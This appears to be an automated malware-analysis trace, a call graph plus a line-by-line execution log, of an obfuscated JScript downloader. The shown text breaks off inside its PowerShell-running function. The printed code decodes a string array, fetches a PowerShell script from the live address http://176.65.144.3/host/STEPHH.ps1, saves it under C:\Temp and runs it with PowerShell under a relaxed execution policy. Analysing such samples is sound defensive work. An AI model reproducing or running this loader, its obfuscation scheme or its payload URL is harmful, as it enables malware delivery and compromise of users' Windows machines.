callgraph clusterC0 clusterC2C0 clusterC4C2 clusterC6C2 clusterC8C2 clusterC10C2 clusterC12C2 clusterC14C2 clusterC16C2 clusterC18C0 clusterC20C0 clusterC22C0 clusterC24C22 clusterC26C0 clusterC28C0 clusterC30C28 clusterC32C0 clusterC34C32 clusterC36C32 clusterC38C32 clusterC40C0 clusterC42C40 clusterC44C0 clusterC46C44 E1C0 entry:C0 F3C2 E1C0->F3C2 F19C18 i E1C0->F19C18 F21C20 'CreateObject' E1C0->F21C20 F27C26 'FolderExists' E1C0->F27C26 F33C32 DownloadScript E1C0->F33C32 F41C40 LogError E1C0->F41C40 F45C44 RunPowerShellScript E1C0->F45C44 F5C4 c F3C2->F5C4 F7C6 parseInt F3C2->F7C6 F9C8 h F3C2->F9C8 F11C10 'push' F3C2->F11C10 F13C12 'shift' F3C2->F13C12 F15C14 'push' F3C2->F15C14 F17C16 'shift' F3C2->F17C16 F23C22 a F23C22->F23C22 F25C24 F29C28 b F29C28->F23C22 F29C28->F29C28 F31C30 F35C34 'Open' F33C32->F35C34 F37C36 j F33C32->F37C36 F39C38 'Write' F33C32->F39C38 F33C32->F41C40 F43C42 k F41C40->F43C42 F45C44->F41C40 F47C46 l F45C44->F47C46

Script:

Code
0
var i = b;
    1
    ( function (c, d) {
    • (function a(),804148) ➔ undefined
    • (function a(),804148) ➔ undefined
    • Show all Function Runs
    2
    var h = b, e = c ( );
    • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
    • Show all Function Runs
    3
    while (! ! [ ] )
      4
      {
        5
        try
          6
          {
            7
            var f = - parseInt ( h ( 0x18e ) ) / 0x1 + parseInt ( h ( 0x191 ) ) / 0x2 + - parseInt ( h ( 0x193 ) ) / 0x3 * ( parseInt ( h ( 0x188 ) ) / 0x4 ) + - parseInt ( h ( 0x18b ) ) / 0x5 + parseInt ( h ( 0x186 ) ) / 0x6 * ( parseInt ( h ( 0x192 ) ) / 0x7 ) + parseInt ( h ( 0x189 ) ) / 0x8 + - parseInt ( h ( 0x199 ) ) / 0x9;
            • b(398) ➔ "2517564fkfCOx"
            • parseInt("2517564fkfCOx") ➔ 2517564
            • b(401) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
            • parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
            • b(403) ➔ "Exiting script due to download failure."
            • parseInt("Exiting script due to download failure.") ➔ NaN
            • b(392) ➔ "7983160sibqMu"
            • parseInt("7983160sibqMu") ➔ 7983160
            • b(395) ➔ "681737xLucls"
            • parseInt("681737xLucls") ➔ 681737
            • b(390) ➔ "10002992MECXEh"
            • parseInt("10002992MECXEh") ➔ 10002992
            • b(402) ➔ "Status"
            • parseInt("Status") ➔ NaN
            • b(393) ➔ "Error downloading script: "
            • parseInt("Error downloading script: ") ➔ NaN
            • b(409) ➔ "Scripting.FileSystemObject"
            • parseInt("Scripting.FileSystemObject") ➔ NaN
            • b(398) ➔ "448NTkgQQ"
            • parseInt("448NTkgQQ") ➔ 448
            • h(401) ➔ "Status"
            • parseInt("Status") ➔ NaN
            • h(403) ➔ "CreateFolder"
            • parseInt("CreateFolder") ➔ NaN
            • h(392) ➔ "Error downloading script: "
            • parseInt("Error downloading script: ") ➔ NaN
            • h(395) ➔ "Run"
            • parseInt("Run") ➔ NaN
            • h(390) ➔ "MSXML2.XMLHTTP"
            • parseInt("MSXML2.XMLHTTP") ➔ NaN
            • h(402) ➔ "Exiting script due to download failure."
            • parseInt("Exiting script due to download failure.") ➔ NaN
            • h(393) ➔ "C:\Temp\QCCZXZFSSHSHSJ.ps1"
            • parseInt("C:\Temp\QCCZXZFSSHSHSJ.ps1") ➔ NaN
            • h(409) ➔ "Close"
            • parseInt("Close") ➔ NaN
            • h(398) ➔ "285iasvbG"
            • parseInt("285iasvbG") ➔ 285
            • h(401) ➔ "Exiting script due to download failure."
            • parseInt("Exiting script due to download failure.") ➔ NaN
            • h(403) ➔ "Send"
            • parseInt("Send") ➔ NaN
            • h(392) ➔ "C:\Temp\QCCZXZFSSHSHSJ.ps1"
            • parseInt("C:\Temp\QCCZXZFSSHSHSJ.ps1") ➔ NaN
            • h(395) ➔ "GET"
            • parseInt("GET") ➔ NaN
            • h(390) ➔ "7983160sibqMu"
            • parseInt("7983160sibqMu") ➔ 7983160
            • h(402) ➔ "CreateFolder"
            • parseInt("CreateFolder") ➔ NaN
            • h(393) ➔ "681737xLucls"
            • parseInt("681737xLucls") ➔ 681737
            • h(409) ➔ "Quit"
            • parseInt("Quit") ➔ NaN
            • h(398) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
            • parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
            • h(401) ➔ "CreateFolder"
            • parseInt("CreateFolder") ➔ NaN
            • h(403) ➔ "3105342MaeYXZ"
            • parseInt("3105342MaeYXZ") ➔ 3105342
            • h(392) ➔ "681737xLucls"
            • parseInt("681737xLucls") ➔ 681737
            • h(395) ➔ "2517564fkfCOx"
            • parseInt("2517564fkfCOx") ➔ 2517564
            • h(390) ➔ "Error downloading script: "
            • parseInt("Error downloading script: ") ➔ NaN
            • h(402) ➔ "Send"
            • parseInt("Send") ➔ NaN
            • h(393) ➔ "Run"
            • parseInt("Run") ➔ NaN
            • h(409) ➔ "CreateTextFile"
            • parseInt("CreateTextFile") ➔ NaN
            • h(398) ➔ "Status"
            • parseInt("Status") ➔ NaN
            • h(401) ➔ "Send"
            • parseInt("Send") ➔ NaN
            • h(403) ➔ "message"
            • parseInt("message") ➔ NaN
            • h(392) ➔ "Run"
            • parseInt("Run") ➔ NaN
            • h(395) ➔ "448NTkgQQ"
            • parseInt("448NTkgQQ") ➔ 448
            • h(390) ➔ "C:\Temp\QCCZXZFSSHSHSJ.ps1"
            • parseInt("C:\Temp\QCCZXZFSSHSHSJ.ps1") ➔ NaN
            • h(402) ➔ "3105342MaeYXZ"
            • parseInt("3105342MaeYXZ") ➔ 3105342
            • h(393) ➔ "GET"
            • parseInt("GET") ➔ NaN
            • h(409) ➔ "http://176.65.144.3/host/STEPHH.ps1"
            • parseInt("http://176.65.144.3/host/STEPHH.ps1") ➔ NaN
            • h(398) ➔ "Exiting script due to download failure."
            • parseInt("Exiting script due to download failure.") ➔ NaN
            • h(401) ➔ "3105342MaeYXZ"
            • parseInt("3105342MaeYXZ") ➔ 3105342
            • h(403) ➔ "Echo"
            • parseInt("Echo") ➔ NaN
            • h(392) ➔ "GET"
            • parseInt("GET") ➔ NaN
            • h(395) ➔ "285iasvbG"
            • parseInt("285iasvbG") ➔ 285
            • h(390) ➔ "681737xLucls"
            • parseInt("681737xLucls") ➔ 681737
            • h(402) ➔ "message"
            • parseInt("message") ➔ NaN
            • h(393) ➔ "2517564fkfCOx"
            • parseInt("2517564fkfCOx") ➔ 2517564
            • h(409) ➔ "CreateObject"
            • parseInt("CreateObject") ➔ NaN
            • h(398) ➔ "CreateFolder"
            • parseInt("CreateFolder") ➔ NaN
            • h(401) ➔ "message"
            • parseInt("message") ➔ NaN
            • h(403) ➔ "Scripting.FileSystemObject"
            • parseInt("Scripting.FileSystemObject") ➔ NaN
            • h(392) ➔ "2517564fkfCOx"
            • parseInt("2517564fkfCOx") ➔ 2517564
            • h(395) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
            • parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
            • h(390) ➔ "Run"
            • parseInt("Run") ➔ NaN
            • h(402) ➔ "Echo"
            • parseInt("Echo") ➔ NaN
            • h(393) ➔ "448NTkgQQ"
            • parseInt("448NTkgQQ") ➔ 448
            • h(409) ➔ "C:\Temp"
            • parseInt("C:\Temp") ➔ NaN
            • h(398) ➔ "Send"
            • parseInt("Send") ➔ NaN
            • h(401) ➔ "Echo"
            • parseInt("Echo") ➔ NaN
            • h(403) ➔ "Close"
            • parseInt("Close") ➔ NaN
            • h(392) ➔ "448NTkgQQ"
            • parseInt("448NTkgQQ") ➔ 448
            • h(395) ➔ "Status"
            • parseInt("Status") ➔ NaN
            • h(390) ➔ "GET"
            • parseInt("GET") ➔ NaN
            • h(402) ➔ "Scripting.FileSystemObject"
            • parseInt("Scripting.FileSystemObject") ➔ NaN
            • h(393) ➔ "285iasvbG"
            • parseInt("285iasvbG") ➔ 285
            • h(409) ➔ "101766JtIuDf"
            • parseInt("101766JtIuDf") ➔ 101766
            • h(398) ➔ "3105342MaeYXZ"
            • parseInt("3105342MaeYXZ") ➔ 3105342
            • h(401) ➔ "Scripting.FileSystemObject"
            • parseInt("Scripting.FileSystemObject") ➔ NaN
            • h(403) ➔ "Quit"
            • parseInt("Quit") ➔ NaN
            • h(392) ➔ "285iasvbG"
            • parseInt("285iasvbG") ➔ 285
            • h(395) ➔ "Exiting script due to download failure."
            • parseInt("Exiting script due to download failure.") ➔ NaN
            • h(390) ➔ "2517564fkfCOx"
            • parseInt("2517564fkfCOx") ➔ 2517564
            • h(402) ➔ "Close"
            • parseInt("Close") ➔ NaN
            • h(393) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
            • parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
            • h(409) ➔ "Download failed with status: "
            • parseInt("Download failed with status: ") ➔ NaN
            • h(398) ➔ "message"
            • parseInt("message") ➔ NaN
            • h(401) ➔ "Close"
            • parseInt("Close") ➔ NaN
            • h(403) ➔ "CreateTextFile"
            • parseInt("CreateTextFile") ➔ NaN
            • h(392) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
            • parseInt("PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ") ➔ NaN
            • h(395) ➔ "CreateFolder"
            • parseInt("CreateFolder") ➔ NaN
            • h(390) ➔ "448NTkgQQ"
            • parseInt("448NTkgQQ") ➔ 448
            • h(402) ➔ "Quit"
            • parseInt("Quit") ➔ NaN
            • h(393) ➔ "Status"
            • parseInt("Status") ➔ NaN
            • h(409) ➔ "7036jtZYOd"
            • parseInt("7036jtZYOd") ➔ 7036
            • Show all Function Runs
            8
            if ( f === d )
              9
              break ;
                10
                else
                  11
                  e['push'] ( e['shift'] ( ) );
                    12
                    }
                      13
                      catch ( g )
                        14
                        {
                          15
                          e['push'] ( e['shift'] ( ) );
                            16
                            }
                              17
                              }
                                18
                                } ( a, 0xc4534 ) );
                                  19
                                  var URL = i ( 0x183 ), DownloadPath = i ( 0x18d ), TEMP_DIR = i ( 0x185 ), SUCCESS_STATUS = 0xc8, POWERSHELL_CMD = i ( 0x194 ), shell = WScript[i ( 0x184 ) ] ( 'WScript.Shell' ), fileSystem = WScript[i ( 0x184 ) ] ( i ( 0x17f ) ), http = WScript['CreateObject'] ( i ( 0x18a ) );
                                  • i(387) ➔ "http://176.65.144.3/host/STEPHH.ps1"
                                  • i(397) ➔ "C:\Temp\QCCZXZFSSHSHSJ.ps1"
                                  • i(389) ➔ "C:\Temp"
                                  • i(404) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                  • i(388) ➔ "CreateObject"
                                  • Windows Script Host.CreateObject("WScript.Shell") ➔
                                  • i(388) ➔ "CreateObject"
                                  • i(383) ➔ "Scripting.FileSystemObject"
                                  • Windows Script Host.CreateObject("Scripting.FileSystemObject") ➔
                                  • i(394) ➔ "MSXML2.XMLHTTP"
                                  • Windows Script Host.CreateObject("MSXML2.XMLHTTP") ➔
                                  • Show all Function Runs
                                  20
                                  function a() {
                                  • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                  • Show all Function Runs
                                  21
                                  var m = [ 'Close', 'Quit', 'CreateTextFile', 'http://176.65.144.3/host/STEPHH.ps1', 'CreateObject', 'C:\x5cTemp', '101766JtIuDf', 'Download\x20failed\x20with\x20status:\x20', '7036jtZYOd', '10002992MECXEh', 'MSXML2.XMLHTTP', '7983160sibqMu', 'Error\x20downloading\x20script:\x20', 'C:\x5cTemp\x5cQCCZXZFSSHSHSJ.ps1', '681737xLucls', 'Run', 'GET', '2517564fkfCOx', '448NTkgQQ', '285iasvbG', 'PowerShell\x20-NoProfile\x20-ExecutionPolicy\x20RemoteSigned\x20-File\x20', 'Status', 'Exiting\x20script\x20due\x20to\x20download\x20failure.', 'CreateFolder', 'Send', '3105342MaeYXZ', 'message', 'Echo', 'Scripting.FileSystemObject' ];
                                    22
                                    a =
                                      23
                                      function () {
                                      • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                      • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                      • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                      • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                      • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                      • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                      • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                      • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                      • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                      • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                      • Show all Function Runs
                                      24
                                      return m;
                                        25
                                        };
                                          26
                                          return a ( );
                                          • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                          • Show all Function Runs
                                          27
                                          }
                                            28
                                            ! fileSystem['FolderExists'] ( TEMP_DIR ) && fileSystem[i ( 0x197 ) ] ( TEMP_DIR );
                                            • FolderExists("C:\Temp") ➔ false
                                            • i(407) ➔ "CreateFolder"
                                            • CreateFolder("C:\Temp") ➔ C:\Temp
                                            • Show all Function Runs
                                            29
                                            function b(c, d) {
                                            • b(398) ➔ "2517564fkfCOx"
                                            • b(401) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                            • b(403) ➔ "Exiting script due to download failure."
                                            • b(392) ➔ "7983160sibqMu"
                                            • b(395) ➔ "681737xLucls"
                                            • b(390) ➔ "10002992MECXEh"
                                            • b(402) ➔ "Status"
                                            • b(393) ➔ "Error downloading script: "
                                            • b(409) ➔ "Scripting.FileSystemObject"
                                            • b(398) ➔ "448NTkgQQ"
                                            • Show all Function Runs
                                            30
                                            var e = a ( );
                                            • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                            • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                            • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                            • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                            • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                            • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                            • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                            • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                            • a() ➔ Close,Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject
                                            • a() ➔ Quit,CreateTextFile,http://176.65.144.3/host/STEPHH.ps1,CreateObject,C:\Temp,101766JtIuDf,Download failed with status: ,7036jtZYOd,10002992MECXEh,MSXML2.XMLHTTP,7983160sibqMu,Error downloading script: ,C:\Temp\QCCZXZFSSHSHSJ.ps1,681737xLucls,Run,GET,2517564fkfCOx,448NTkgQQ,285iasvbG,PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File ,Status,Exiting script due to download failure.,CreateFolder,Send,3105342MaeYXZ,message,Echo,Scripting.FileSystemObject,Close
                                            • Show all Function Runs
                                            31
                                            return b =
                                              32
                                              function (f, g) {
                                              • b(398,undefined) ➔ "2517564fkfCOx"
                                              • b(401,undefined) ➔ "PowerShell -NoProfile -ExecutionPolicy RemoteSigned -File "
                                              • b(403,undefined) ➔ "Exiting script due to download failure."
                                              • b(392,undefined) ➔ "7983160sibqMu"
                                              • b(395,undefined) ➔ "681737xLucls"
                                              • b(390,undefined) ➔ "10002992MECXEh"
                                              • b(402,undefined) ➔ "Status"
                                              • b(393,undefined) ➔ "Error downloading script: "
                                              • b(409,undefined) ➔ "Scripting.FileSystemObject"
                                              • b(398,undefined) ➔ "448NTkgQQ"
                                              • Show all Function Runs
                                              33
                                              f = f - 0x17d;
                                                34
                                                var h = e[f];
                                                  35
                                                  return h;
                                                    36
                                                    }, b ( c, d );
                                                      37
                                                      }
                                                        38
                                                        function DownloadScript(c, d) {
                                                        • DownloadScript("http://176.65.144.3/host/STEPHH.ps1","C:\Temp\QCCZXZFSSHSHSJ.ps1") ➔ false
                                                        • Show all Function Runs
                                                        39
                                                        var j = i;
                                                          40
                                                          try
                                                            41
                                                            {
                                                              42
                                                              http['Open'] ( j ( 0x190 ), c, ! [] ), http[j ( 0x198 ) ] ( );
                                                              • j(400) ➔ "GET"
                                                              • Open("GET","http://176.65.144.3/host/STEPHH.ps1",false) ➔ undefined
                                                              • j(408) ➔ "Send"
                                                              • Send() ➔ undefined
                                                              • Show all Function Runs
                                                              43
                                                              if ( http[j ( 0x195 ) ] === SUCCESS_STATUS )
                                                                44
                                                                {
                                                                  45
                                                                  var f = fileSystem[j ( 0x182 ) ] ( d, ! ! [] );
                                                                    46
                                                                    return f['Write'] ( http['ResponseText'] ), f[j ( 0x180 ) ] ( ), ! ! [];
                                                                      47
                                                                      }
                                                                        48
                                                                        else
                                                                          49
                                                                          return LogError ( j ( 0x187 ) + http[j ( 0x195 ) ] ), ! [];
                                                                            50
                                                                            }
                                                                              51
                                                                              catch ( g )
                                                                                52
                                                                                {
                                                                                  53
                                                                                  return LogError ( j ( 0x18c ) + g[j ( 0x17d ) ] ), ! [];
                                                                                  • j(396) ➔ "Error downloading script: "
                                                                                  • j(381) ➔ "message"
                                                                                  • LogError("Error downloading script: The system cannot locate the resource specified. ") ➔ undefined
                                                                                  • Show all Function Runs
                                                                                  54
                                                                                  }
                                                                                    55
                                                                                    }
                                                                                      56
                                                                                      function LogError(c) {
                                                                                      • LogError("Error downloading script: The system cannot locate the resource specified. ") ➔ undefined
                                                                                      • LogError("Exiting script due to download failure.") ➔ undefined
                                                                                      • Show all Function Runs
                                                                                      57
                                                                                      var k = i;
                                                                                        58
                                                                                        WScript[k ( 0x17e ) ] ( c );
                                                                                        • k(382) ➔ "Echo"
                                                                                        • Windows Script Host.Echo("Error downloading script: The system cannot locate the resource specified. ") ➔ undefined
                                                                                        • k(382) ➔ "Echo"
                                                                                        • Windows Script Host.Echo("Exiting script due to download failure.") ➔ undefined
                                                                                        • Show all Function Runs
                                                                                        59
                                                                                        }
                                                                                          60
                                                                                          function RunPowerShellScript(c) {
                                                                                            61
                                                                                            var l = i;
                                                                                              62
                                                                                              try
                                                                                                63
                                                                                                {
                                                                                                  64
                                                                                                  var d = POWERSHELL_CMD + '\x22' + c + '\x22';
                                                                                                    65
                                                                                                    shell[l ( 0x18f ) ] ( d, 0x0, ! ! [] );
                                                                                                      66
                                                                                                      }
                                                                                                        67
                                                                                                        catch ( f )
                                                                                                          68
                                                                                                          {
                                                                                                            69
